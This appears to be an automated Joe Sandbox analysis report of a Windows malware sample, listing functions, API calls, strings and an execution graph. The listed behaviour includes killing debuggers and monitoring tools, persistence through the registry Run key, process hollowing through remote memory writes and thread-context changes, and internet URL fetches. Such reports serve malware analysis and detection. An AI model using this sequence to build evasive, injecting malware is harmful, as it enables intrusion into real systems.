                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        • API String ID: 2853470409-928700279
                                                                                                                                                                                                                        • Opcode ID: 7025b17d87294329de3cc266a73b50fcb0614222f694bb80ca69dde199845389
                                                                                                                                                                                                                        • Instruction ID: 52c7daecf4633ac95507ba77423cf500d790c9560716984fbfb59a73c7effb38
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7025b17d87294329de3cc266a73b50fcb0614222f694bb80ca69dde199845389
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60217424E2C50391EA08EB20D8961FD2225EF50754FA043B3E41FC21E3EF6DE5658361
                                                                                                                                                                                                                        Function 00007FF6DAD72E08 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 299056699-189039185
                                                                                                                                                                                                                        • Opcode ID: 10555049a1e5e970aacc173f1715d106100e4f0dc8ec30993202ec39d8a78e4e
                                                                                                                                                                                                                        • Instruction ID: e07da5aebd852be554b882345d6a28a612dd924b8f13d4c62532ae2b620dcf46
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10555049a1e5e970aacc173f1715d106100e4f0dc8ec30993202ec39d8a78e4e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2901E526E0CA4281E7389B11E85423D6760FB98B96F940673E98FC6679CE3CE5E58601
                                                                                                                                                                                                                        Function 00007FF6DAD73DF0 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7a16b558b3a5aabe8e9edc648b30ff0989d79b9dce4d7edaa0226f1c99cc9121
                                                                                                                                                                                                                        • Instruction ID: b99d417e82cd9d8446d30e023f4bcfff02718281ea2d28238a657d837e3c1f36
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a16b558b3a5aabe8e9edc648b30ff0989d79b9dce4d7edaa0226f1c99cc9121
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D214931E0CA8281E7789B15E84836E6361FBC0B55F604372C69EC25A9DF3CD4A4CB00
                                                                                                                                                                                                                        Function 00007FF6DAD72EA8 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        • Opcode ID: 0ff44a8e6de8ed1e0195ea57690e214b8abe1ab05dd50aed0b9b1818bdfdce29
                                                                                                                                                                                                                        • Instruction ID: d5d4d2f790eb6d5e28e873f238a43f22dbc796fb101daf3f445dce3906044810
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ff44a8e6de8ed1e0195ea57690e214b8abe1ab05dd50aed0b9b1818bdfdce29
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D201EC36D1CA82C2E7289B21E85423D6370FBC8B46F500276E98FC6669CF3CD5A48B01
                                                                                                                                                                                                                        Function 00007FF6DAD73CB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        • Opcode ID: fdec89f59edf3eb6797727eaad360a689e09697676163aab672e6b7c8a7a61d1
                                                                                                                                                                                                                        • Instruction ID: d8aa03e464e875071d536a6aaca173ac36333c87357c21455622c1b01efa63cb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fdec89f59edf3eb6797727eaad360a689e09697676163aab672e6b7c8a7a61d1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E31A776A1CAC486D774DB15E4987AEA3A0FB88B41F500226DA8EC3B68DF3CD554CB00
                                                                                                                                                                                                                        Function 00007FF6DAD73B50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                        • API String ID: 779948276-85274793
                                                                                                                                                                                                                        • Opcode ID: eeeb668cb3ebc31c330d6d5e78252b73bef579c735708216c362ce484c2523da
                                                                                                                                                                                                                        • Instruction ID: c11fb3422c67894ae22a6fb8cba1c438e8de30fb76e19dc5d54d851c99ac72bc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eeeb668cb3ebc31c330d6d5e78252b73bef579c735708216c362ce484c2523da
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E501E976A1CA808AD7508B14E84471EB7B4F788795F901266EB8E83B69DF7DC155CF00
                                                                                                                                                                                                                        Function 00007FF6DAD713C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: fb5a9ecd2b874fac3986ba4706811ef1abcbba46fc7a18efb9d8a75c217fb83a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3301FB32D0C656C6E7388B10E44832E67A0FB84348F904376E68F826A5DF7CD66ACF01
                                                                                                                                                                                                                        Function 00007FF6DAD73FD0 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 7ef93d6c8be03e0e8067038787ae35eedaf0d19a6d09eeffd0ee61b9360f4694
                                                                                                                                                                                                                        • Instruction ID: dc45168dcc91782efe805fa236d014b1bc18ef9f2a4b441ab775922adf4b3fc4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ef93d6c8be03e0e8067038787ae35eedaf0d19a6d09eeffd0ee61b9360f4694
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B11E871E0CA8681E7748F14E88837E63A0FB847A5F504376D69EC26A9DF3DD464CB00
                                                                                                                                                                                                                        Function 00007FF6DAD73980 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                        • API String ID: 779948276-1428018034
                                                                                                                                                                                                                        • Opcode ID: 63c1ccfa42da33961596c073b4ba4259c04753ac5328876c0619d7e38573e54f
                                                                                                                                                                                                                        • Instruction ID: 00fe8d193b8e07480f87601656dd97b116b5b44a66c812d5ba5d1ab45ee0feed
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63c1ccfa42da33961596c073b4ba4259c04753ac5328876c0619d7e38573e54f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0411423292C68086D7508B24E44462E77A0F7847A0F505371E95E83BA9DF7CD194CB00
                                                                                                                                                                                                                        Function 00007FF6DAD71088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: 186ccbca2173ea038a88845216ff46960a4a7a8b93478040848c3a5d589682a0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73E07D25D5CA82C2E6689B10F85537D63A0FB84744F900776E58F826A5DF3CD66ACB01
                                                                                                                                                                                                                        Function 00007FF6DAD72F38 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD738D9
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD738EE
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73901
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73911
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73924
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73939
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD7394C
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD73890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAD73A75), ref: 00007FF6DAD73961
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD74530: CreateFileW.KERNEL32 ref: 00007FF6DAD74577
                                                                                                                                                                                                                          • Part of subcall function 00007FF6DAD710D8: OpenProcess.KERNEL32 ref: 00007FF6DAD710FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF6DAD72FD3
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF6DAD72FE6
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                        • Opcode ID: cb198f8349b0474e8430296de8ad644e8f73609a5c45828ea2168c8d2c9a5573
                                                                                                                                                                                                                        • Instruction ID: 8daeb12a19a17874c42ba58a412faf5c2ef0e0705cdf2d5c348104443150ff67
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb198f8349b0474e8430296de8ad644e8f73609a5c45828ea2168c8d2c9a5573
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5011FE71D1CA8291E758DB60F8593AE73A0FF84709F6002B7D55EC2666DF7CE0A58740

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:23.9%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:479
                                                                                                                                                                                                                        Total number of Limit Nodes:5
                                                                                                                                                                                                                        execution_graph 1354 7ff6ec843348 1357 7ff6ec8424d8 GetModuleFileNameW 1354->1357 1358 7ff6ec842559 1357->1358 1364 7ff6ec842554 1357->1364 1359 7ff6ec842597 1358->1359 1360 7ff6ec8425ad 1358->1360 1361 7ff6ec8425cb 1359->1361 1362 7ff6ec8425a1 1359->1362 1400 7ff6ec842418 ExpandEnvironmentStringsW 1360->1400 1401 7ff6ec842458 ExpandEnvironmentStringsW 1361->1401 1362->1364 1402 7ff6ec842498 ExpandEnvironmentStringsW 1362->1402 1365 7ff6ec8425c2 1365->1364 1368 7ff6ec84261d CreateProcessW 1365->1368 1368->1364 1369 7ff6ec842678 CreateFileW 1368->1369 1369->1364 1370 7ff6ec8426bf GetFileSize 1369->1370 1371 7ff6ec8426e7 CloseHandle 1370->1371 1372 7ff6ec8426dd 1370->1372 1371->1364 1372->1371 1373 7ff6ec8426f7 VirtualAlloc 1372->1373 1374 7ff6ec842731 ReadFile 1373->1374 1375 7ff6ec842721 CloseHandle 1373->1375 1376 7ff6ec842781 CloseHandle GetThreadContext 1374->1376 1377 7ff6ec84275e VirtualFree CloseHandle 1374->1377 1375->1364 1378 7ff6ec8427e9 ReadProcessMemory GetModuleHandleA GetProcAddress 1376->1378 1379 7ff6ec8427d1 VirtualFree 1376->1379 1377->1364 1380 7ff6ec84286c 1378->1380 1379->1364 1381 7ff6ec842888 VirtualAllocEx 1380->1381 1382 7ff6ec842870 VirtualFree 1380->1382 1383 7ff6ec84290b WriteProcessMemory 1381->1383 1384 7ff6ec8428f3 VirtualFree 1381->1384 1382->1364 1385 7ff6ec842941 VirtualFree 1383->1385 1388 7ff6ec842959 1383->1388 1384->1364 1385->1364 1386 7ff6ec84298f WriteProcessMemory 1387 7ff6ec842a1a VirtualFree 1386->1387 1386->1388 1387->1364 1388->1386 1393 7ff6ec842a37 1388->1393 1389 7ff6ec842aa9 RtlCompareMemory 1389->1393 1397 7ff6ec842afc 1389->1397 1390 7ff6ec842d28 WriteProcessMemory SetThreadContext 1391 7ff6ec842dae VirtualFree 1390->1391 1392 7ff6ec842dc3 ResumeThread 1390->1392 1391->1364 1394 7ff6ec842dea VirtualFree 1392->1394 1395 7ff6ec842dd5 VirtualFree 1392->1395 1393->1389 1393->1390 1394->1364 1395->1364 1396 7ff6ec842d23 1396->1390 1397->1396 1398 7ff6ec842c2c ReadProcessMemory WriteProcessMemory 1397->1398 1398->1397 1399 7ff6ec842d01 VirtualFree 1398->1399 1399->1364 1400->1365 1401->1365 1402->1365 1412 7ff6ec843368 1413 7ff6ec8424d8 36 API calls 1412->1413 1414 7ff6ec84337b 1413->1414 1432 7ff6ec841088 GetModuleHandleA GetProcAddress 1433 7ff6ec8410bb 1432->1433 1434 7ff6ec843188 1435 7ff6ec843191 1434->1435 1436 7ff6ec8431aa 1435->1436 1439 7ff6ec843008 1435->1439 1444 7ff6ec842e08 CreateMutexA 1439->1444 1442 7ff6ec843068 Sleep 1442->1435 1443 7ff6ec843023 Sleep CreateThread WaitForSingleObject 1443->1442 1445 7ff6ec842e51 GetLastError 1444->1445 1446 7ff6ec842e34 ReleaseMutex CloseHandle 1444->1446 1448 7ff6ec842e7b ReleaseMutex CloseHandle 1445->1448 1449 7ff6ec842e5e ReleaseMutex CloseHandle 1445->1449 1447 7ff6ec842e93 1446->1447 1447->1442 1447->1443 1448->1447 1449->1447 1471 7ff6ec842ea8 CreateMutexA 1472 7ff6ec842ecd ReleaseMutex CloseHandle 1471->1472 1473 7ff6ec842eea GetLastError 1471->1473 1474 7ff6ec842f2c 1472->1474 1475 7ff6ec842ef7 ReleaseMutex CloseHandle 1473->1475 1476 7ff6ec842f14 ReleaseMutex CloseHandle 1473->1476 1475->1474 1476->1474 1415 7ff6ec84216c 1416 7ff6ec842196 InternetOpenW 1415->1416 1417 7ff6ec8421d0 InternetOpenUrlW 1416->1417 1418 7ff6ec8421c3 Sleep 1416->1418 1419 7ff6ec842259 HttpQueryInfoA 1417->1419 1420 7ff6ec842207 InternetOpenUrlW 1417->1420 1418->1416 1421 7ff6ec842288 